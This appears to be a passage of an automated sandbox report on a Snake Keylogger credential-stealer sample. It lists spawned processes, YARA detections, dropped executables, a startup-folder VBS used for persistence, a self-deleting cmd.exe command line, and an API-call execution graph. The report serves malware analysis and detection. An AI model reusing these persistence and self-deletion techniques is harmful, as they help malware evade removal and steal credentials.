                                                                      Imagebase:0xb60000
                                                                      File size:2'382'336 bytes
                                                                      MD5 hash:A031DA4BAE8BD9CF87C071C94F67D21B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 66%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:10:46:50
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\8kDIr4ZdNj.exe"
                                                                      Imagebase:0x330000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:10:46:51
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:10:46:51
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe"
                                                                      Imagebase:0x7ff75ecb0000
                                                                      File size:1'663'264 bytes
                                                                      MD5 hash:5EFEF6CC9CD24BAEEED71C1107FC32DF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:6
                                                                      Start time:10:46:51
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"
                                                                      Imagebase:0xd20000
                                                                      File size:134'144 bytes
                                                                      MD5 hash:099EB488DBC2288AB41C4EF64EA7DBA4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2304736561.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: unknown
                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Florian Roth
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: ditekSHen
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:10:47:00
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs"
                                                                      Imagebase:0x7ff6b5290000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:10:47:00
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\konked\lecheries.exe"
                                                                      Imagebase:0xb60000
                                                                      File size:2'382'336 bytes
                                                                      MD5 hash:A031DA4BAE8BD9CF87C071C94F67D21B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:10:47:02
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\konked\lecheries.exe"
                                                                      Imagebase:0xaf0000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:10:47:03
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:10:47:03
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"
                                                                      Imagebase:0x1c0000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:10:47:04
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:10:47:04
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:choice /C Y /N /D Y /T 3
                                                                      Imagebase:0xc20000
                                                                      File size:28'160 bytes
                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:17
                                                                      Start time:10:47:13
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\notepad.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt
                                                                      Imagebase:0x7ff6a0030000
                                                                      File size:201'216 bytes
                                                                      MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                        Execution Graph

                                                                        Execution Coverage:3%
                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                        Signature Coverage:4.3%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:88
102373 8958ba CloseHandle 101979->102373 101982 897667 59 API calls 101981->101982 101983 90c2f4 101982->101983 101984 897667 59 API calls 101983->101984 101985 90c2fc 101984->101985 101986 897667 59 API calls 101985->101986 101987 90c304 101986->101987 101988 899837 59 API calls 101987->101988 102012 90c312 101988->102012 101989 897bcc 59 API calls 101989->102012 101990 90c4fb 101994 90c528 Mailbox 101990->101994 102389 899a3c 59 API calls Mailbox 101990->102389 101991 90c4e2 102382 897cab 101991->102382 101994->101857 101995 897924 59 API calls 101995->102012 101996 90c4fd 101999 897cab 59 API calls 101996->101999 101997 898047 59 API calls 101997->102012 102001 90c50c 101999->102001 102000 897b2e 59 API calls 102000->101990 102003 897b2e 59 API calls 102001->102003 102002 897e4f 59 API calls 102005 90c3a9 CharUpperBuffW 102002->102005 102003->101990 102004 897e4f 59 API calls 102007 90c469 CharUpperBuffW 102004->102007 102380 89843a 68 API calls 102005->102380 102381 89c5a7 69 API calls 2 library calls 102007->102381 102009 899837 59 API calls 102009->102012 102010 897cab 59 API calls 102010->102012 102011 897b2e 59 API calls 102011->102012 102012->101989 102012->101990 102012->101991 102012->101994 102012->101995 102012->101996 102012->101997 102012->102002 102012->102004 102012->102009 102012->102010 102012->102011 102014 8f7962 102013->102014 102015 8b0db6 Mailbox 59 API calls 102014->102015 102016 8f7970 102015->102016 102017 8f797e 102016->102017 102018 897667 59 API calls 102016->102018 102017->101857 102018->102017 102020 897df0 __NMSG_WRITE _memmove 102019->102020 102021 8b0db6 Mailbox 59 API calls 102020->102021 102022 897e2e 102021->102022 102022->101857 102024 90bcb0 102023->102024 102025 90bc96 102023->102025 102396 90a213 59 API calls Mailbox 102024->102396 102395 8f9e4a 66 API calls 3 library calls 102025->102395 102028 90bcbb 102029 899ea0 281 API calls 102028->102029 102030 90bd1c 102029->102030 102031 90bdae 102030->102031 102034 90bd5d 
102030->102034 102056 90bca8 Mailbox 102030->102056 102032 90be04 102031->102032 102033 90bdb4 102031->102033 102035 899837 59 API calls 102032->102035 102032->102056 102418 8f791a 59 API calls 102033->102418 102397 8f72df 59 API calls Mailbox 102034->102397 102037 90be16 102035->102037 102040 897e4f 59 API calls 102037->102040 102038 90bdd7 102419 895d41 59 API calls Mailbox 102038->102419 102043 90be3a CharUpperBuffW 102040->102043 102042 90bd8d 102398 89f460 102042->102398 102046 90be54 102043->102046 102044 90bddf Mailbox 102420 89fce0 282 API calls 2 library calls 102044->102420 102047 90bea7 102046->102047 102048 90be5b 102046->102048 102050 899837 59 API calls 102047->102050 102421 8f72df 59 API calls Mailbox 102048->102421 102051 90beaf 102050->102051 102422 899e5d 60 API calls 102051->102422 102054 90be89 102055 89f460 281 API calls 102054->102055 102055->102056 102056->101857 102057 90beb9 102057->102056 102058 899837 59 API calls 102057->102058 102059 90bed4 102058->102059 102423 895d41 59 API calls Mailbox 102059->102423 102061 90bee4 102424 89fce0 282 API calls 2 library calls 102061->102424 102855 8e60c0 102063->102855 102065 8e618c 102065->101857 102066->101864 102067->101864 102068->101857 102069->101896 102070->101886 102071->101859 102072->101857 102073->101869 102074->101893 102075->101893 102076->101893 102077->101875 102078->101862 102079->101875 102081 899851 102080->102081 102086 89984b 102080->102086 102082 899857 __itow 102081->102082 102084 8cf4da 102081->102084 102092 8cf552 __i64tow Mailbox _wcscpy 102081->102092 102083 8b0db6 Mailbox 59 API calls 102082->102083 102085 899871 102083->102085 102087 8b0db6 Mailbox 59 API calls 102084->102087 102084->102092 102085->102086 102088 897de1 59 API calls 102085->102088 102094 8957f6 102086->102094 102090 8cf51f 102087->102090 102088->102086 102089 8b0db6 Mailbox 59 API calls 102091 8cf545 102089->102091 102090->102089 102091->102092 102093 897de1 59 API calls 102091->102093 102093->102092 102174 
895c6f 102094->102174 102098 895844 102098->101919 102098->101920 102099 895821 102099->102098 102186 895610 102099->102186 102101 895833 102203 89527b SetFilePointerEx SetFilePointerEx 102101->102203 102103 8cdc07 102204 8f345a SetFilePointerEx SetFilePointerEx WriteFile 102103->102204 102104 89583a 102104->102098 102104->102103 102106 8cdc37 102106->102098 102108 897667 59 API calls 102107->102108 102109 8945b1 102108->102109 102110 897667 59 API calls 102109->102110 102111 8945b9 102110->102111 102112 897667 59 API calls 102111->102112 102113 8945c1 102112->102113 102114 897667 59 API calls 102113->102114 102115 8945c9 102114->102115 102116 8945fd 102115->102116 102117 8cd4d2 102115->102117 102118 89784b 59 API calls 102116->102118 102119 898047 59 API calls 102117->102119 102120 89460b 102118->102120 102121 8cd4db 102119->102121 102122 897d2c 59 API calls 102120->102122 102123 897d8c 59 API calls 102121->102123 102124 894615 102122->102124 102126 894640 102123->102126 102125 89784b 59 API calls 102124->102125 102124->102126 102129 894636 102125->102129 102127 894680 102126->102127 102130 89465f 102126->102130 102140 8cd4fb 102126->102140 102223 89784b 102127->102223 102132 897d2c 59 API calls 102129->102132 102236 8979f2 102130->102236 102131 894691 102135 8946a3 102131->102135 102138 898047 59 API calls 102131->102138 102132->102126 102133 8cd5cb 102136 897bcc 59 API calls 102133->102136 102139 8946b3 102135->102139 102141 898047 59 API calls 102135->102141 102153 8cd588 102136->102153 102138->102135 102143 8946ba 102139->102143 102145 898047 59 API calls 102139->102145 102140->102133 102142 8cd5b4 102140->102142 102152 8cd532 102140->102152 102141->102139 102142->102133 102148 8cd59f 102142->102148 102146 898047 59 API calls 102143->102146 102155 8946c1 Mailbox 102143->102155 102144 89784b 59 API calls 102144->102127 102145->102143 102146->102155 102147 8979f2 59 API calls 102147->102153 102151 897bcc 59 API calls 102148->102151 102149 8cd590 102150 897bcc 59 
API calls 102149->102150 102150->102153 102151->102153 102152->102149 102156 8cd57b 102152->102156 102153->102127 102153->102147 102239 897924 59 API calls 2 library calls 102153->102239 102155->101921 102157 897bcc 59 API calls 102156->102157 102157->102153 102159 8cec6b 102158->102159 102160 897b40 102158->102160 102247 8e7bdb 59 API calls _memmove 102159->102247 102241 897a51 102160->102241 102163 897b4c 102163->101936 102167 8f3c37 102163->102167 102164 8cec75 102165 898047 59 API calls 102164->102165 102166 8cec7d Mailbox 102165->102166 102248 8f445a GetFileAttributesW 102167->102248 102170->101944 102171->101907 102172->101941 102173->101941 102175 895802 102174->102175 102176 895c88 102174->102176 102178 895c99 102175->102178 102176->102175 102177 895c8d CloseHandle 102176->102177 102177->102175 102179 8cdd58 102178->102179 102180 895cb2 CreateFileW 102178->102180 102181 8cdd5e CreateFileW 102179->102181 102182 895cd4 102179->102182 102180->102182 102181->102182 102183 8cdd84 102181->102183 102182->102099 102205 895aee 102183->102205 102187 89562b 102186->102187 102188 8cdba5 102186->102188 102189 895aee 2 API calls 102187->102189 102202 8956ba 102187->102202 102188->102202 102218 895cdf 102188->102218 102190 89564d 102189->102190 102215 89522e 102190->102215 102194 895664 102195 8b0db6 Mailbox 59 API calls 102194->102195 102196 89566f 102195->102196 102197 89522e 59 API calls 102196->102197 102198 89567a 102197->102198 102199 895bc0 2 API calls 102198->102199 102200 8956a7 102199->102200 102201 895aee 2 API calls 102200->102201 102201->102202 102202->102101 102203->102104 102204->102106 102212 895b08 102205->102212 102206 895b8f SetFilePointerEx 102213 895c4e SetFilePointerEx 102206->102213 102209 8cdd28 102214 895c4e SetFilePointerEx 102209->102214 102210 895b63 102210->102182 102211 8cdd42 102212->102206 102212->102209 102212->102210 102213->102210 102214->102211 102216 8b0db6 Mailbox 59 API calls 102215->102216 102217 895240 102216->102217 102217->102188 
102217->102194 102219 895aee 2 API calls 102218->102219 102220 895d00 102219->102220 102221 895aee 2 API calls 102220->102221 102222 895d14 102221->102222 102222->102202 102224 89785a 102223->102224 102225 8978b7 102223->102225 102224->102225 102227 897865 102224->102227 102226 897d2c 59 API calls 102225->102226 102232 897888 _memmove 102226->102232 102228 8ceb09 102227->102228 102229 897880 102227->102229 102231 898029 59 API calls 102228->102231 102240 897f27 59 API calls Mailbox 102229->102240 102233 8ceb13 102231->102233 102232->102131 102234 8b0db6 Mailbox 59 API calls 102233->102234 102235 8ceb33 102234->102235 102237 897e4f 59 API calls 102236->102237 102238 894669 102237->102238 102238->102127 102238->102144 102239->102153 102240->102232 102242 897a5f 102241->102242 102243 897a85 _memmove 102241->102243 102242->102243 102244 8b0db6 Mailbox 59 API calls 102242->102244 102243->102163 102245 897ad4 102244->102245 102246 8b0db6 Mailbox 59 API calls 102245->102246 102246->102243 102247->102164 102249 8f3c3e 102248->102249 102250 8f4475 FindFirstFileW 102248->102250 102249->101936 102249->101937 102250->102249 102251 8f448a FindClose 102250->102251 102251->102249 102253 899837 59 API calls 102252->102253 102254 90cb1a 102253->102254 102256 90cb61 Mailbox 102254->102256 102290 90d7a5 102254->102290 102256->101947 102257 90cf2e 102330 90d8c8 66 API calls Mailbox 102257->102330 102260 90cbb2 Mailbox 102260->102256 102263 899837 59 API calls 102260->102263 102276 90cdb9 102260->102276 102321 90fbce 59 API calls 2 library calls 102260->102321 102322 90cfdf 61 API calls 2 library calls 102260->102322 102261 90cf3d 102262 90cdc7 102261->102262 102265 90cf49 102261->102265 102303 90c96e 102262->102303 102263->102260 102265->102256 102269 90ce00 102317 8b0c08 102269->102317 102272 90ce33 102324 8992ce 59 API calls Mailbox 102272->102324 102273 90ce1a 102323 8f9e4a 66 API calls 3 library calls 102273->102323 102276->102257 102276->102262 102277 90ce3f 102325 899050 59 API 
calls Mailbox 102277->102325 102278 90ce25 GetCurrentProcess TerminateProcess 102278->102272 102280 90ce55 102289 90ce7c 102280->102289 102326 898d40 59 API calls Mailbox 102280->102326 102282 90cfa4 102282->102256 102286 90cfb8 FreeLibrary 102282->102286 102283 90ce6b 102327 90d649 82 API calls _free 102283->102327 102286->102256 102289->102282 102328 898d40 59 API calls Mailbox 102289->102328 102329 899d3c 60 API calls Mailbox 102289->102329 102331 90d649 82 API calls _free 102289->102331 102291 897e4f 59 API calls 102290->102291 102292 90d7c0 CharLowerBuffW 102291->102292 102332 8ef167 102292->102332 102296 897667 59 API calls 102297 90d7f9 102296->102297 102298 89784b 59 API calls 102297->102298 102299 90d810 102298->102299 102300 897d2c 59 API calls 102299->102300 102301 90d81c Mailbox 102300->102301 102302 90d858 Mailbox 102301->102302 102339 90cfdf 61 API calls 2 library calls 102301->102339 102302->102260 102304 90c9de 102303->102304 102305 90c989 102303->102305 102309 90da50 102304->102309 102306 8b0db6 Mailbox 59 API calls 102305->102306 102308 90c9ab 102306->102308 102307 8b0db6 Mailbox 59 API calls 102307->102308 102308->102304 102308->102307 102310 90dc79 Mailbox 102309->102310 102316 90da73 _strcat _wcscpy __NMSG_WRITE 102309->102316 102310->102269 102311 899b98 59 API calls 102311->102316 102312 899be6 59 API calls 102312->102316 102313 899837 59 API calls 102313->102316 102314 8b571c 58 API calls __crtGetStringTypeA_stat 102314->102316 102316->102310 102316->102311 102316->102312 102316->102313 102316->102314 102342 8f5887 61 API calls 2 library calls 102316->102342 102318 8b0c1d 102317->102318 102319 8b0cb5 VirtualProtect 102318->102319 102320 8b0c83 102318->102320 102319->102320 102320->102272 102320->102273 102321->102260 102322->102260 102323->102278 102324->102277 102325->102280 102326->102283 102327->102289 102328->102289 102329->102289 102330->102261 102331->102289 102333 8ef192 __NMSG_WRITE 102332->102333 102334 8ef1d1 102333->102334 102337 
8ef1c7 102333->102337 102338 8ef278 102333->102338 102334->102296 102334->102301 102337->102334 102340 8978c4 61 API calls 102337->102340 102338->102334 102341 8978c4 61 API calls 102338->102341 102339->102302 102340->102337 102341->102338 102342->102316 102344 899aa8 102343->102344 102345 8cf7d6 102343->102345 102349 8b0db6 Mailbox 59 API calls 102344->102349 102346 8cf7e7 102345->102346 102347 897bcc 59 API calls 102345->102347 102348 897d8c 59 API calls 102346->102348 102347->102346 102351 8cf7f1 102348->102351 102350 899abb 102349->102350 102350->102351 102353 899ac6 102350->102353 102352 899ad4 102351->102352 102354 897667 59 API calls 102351->102354 102352->101951 102352->101959 102353->102352 102355 897de1 59 API calls 102353->102355 102354->102352 102355->102352 102357 8955a2 102356->102357 102358 89557d 102356->102358 102359 897d8c 59 API calls 102357->102359 102358->102357 102362 89558c 102358->102362 102363 8f325e 102359->102363 102360 8f328d 102360->101972 102364 895ab8 59 API calls 102362->102364 102363->102360 102377 8f31fa ReadFile SetFilePointerEx 102363->102377 102378 897924 59 API calls 2 library calls 102363->102378 102366 8f337e 102364->102366 102367 8954d2 61 API calls 102366->102367 102368 8f338c 102367->102368 102370 8f339c Mailbox 102368->102370 102379 8977da 61 API calls Mailbox 102368->102379 102370->101972 102371->101953 102372->101976 102373->101977 102374->101959 102375->101970 102376->101975 102377->102363 102378->102363 102379->102370 102380->102012 102381->102012 102383 8ced4a 102382->102383 102384 897cbf 102382->102384 102386 898029 59 API calls 102383->102386 102390 897c50 102384->102390 102388 8ced55 __NMSG_WRITE _memmove 102386->102388 102387 897cca 102387->102000 102389->101994 102391 897c5f __NMSG_WRITE 102390->102391 102392 898029 59 API calls 102391->102392 102393 897c70 _memmove 102391->102393 102394 8ced07 _memmove 102392->102394 102393->102387 102395->102056 102396->102028 102397->102042 102399 89f4ba 102398->102399 102400 
89f650 102398->102400 102401 8d441e 102399->102401 102404 89f4c6 102399->102404 102402 897de1 59 API calls 102400->102402 102403 90bc6b 282 API calls 102401->102403 102409 89f58c Mailbox 102402->102409 102406 8d442c 102403->102406 102515 89f290 282 API calls 2 library calls 102404->102515 102410 89f630 102406->102410 102517 8f9e4a 66 API calls 3 library calls 102406->102517 102408 89f4fd 102408->102406 102408->102409 102408->102410 102412 89f5e3 102409->102412 102416 8f3c37 3 API calls 102409->102416 102425 90445a 102409->102425 102432 894e4a 102409->102432 102438 90df37 102409->102438 102441 8fcb7a 102409->102441 102410->102056 102412->102410 102516 899c90 59 API calls Mailbox 102412->102516 102416->102412 102418->102038 102419->102044 102420->102056 102421->102054 102422->102057 102423->102061 102424->102056 102426 899837 59 API calls 102425->102426 102428 904494 102426->102428 102427 9044c9 102430 899a98 59 API calls 102427->102430 102431 9044cd 102427->102431 102428->102427 102429 899ea0 282 API calls 102428->102429 102429->102427 102430->102431 102431->102412 102433 894e5b 102432->102433 102434 894e54 102432->102434 102436 894e7b FreeLibrary 102433->102436 102437 894e6a 102433->102437 102435 8b53a6 __fcloseall 65 API calls 102434->102435 102435->102433 102436->102437 102437->102412 102439 90cadd 107 API calls 102438->102439 102440 90df47 102439->102440 102440->102412 102442 897667 59 API calls 102441->102442 102443 8fcbaf 102442->102443 102444 897667 59 API calls 102443->102444 102446 8fcbb8 102444->102446 102445 899837 59 API calls 102447 8fcbe9 102445->102447 102446->102445 102448 8fcc0b 102447->102448 102452 8fccea 102447->102452 102456 8fcd1a Mailbox 102447->102456 102449 899837 59 API calls 102448->102449 102450 8fcc17 102449->102450 102451 898047 59 API calls 102450->102451 102454 8fcc23 102451->102454 102453 897667 59 API calls 102452->102453 102452->102456 102455 8fcd4b 102453->102455 102458 8fcc69 102454->102458 102459 8fcc37 102454->102459 102457 
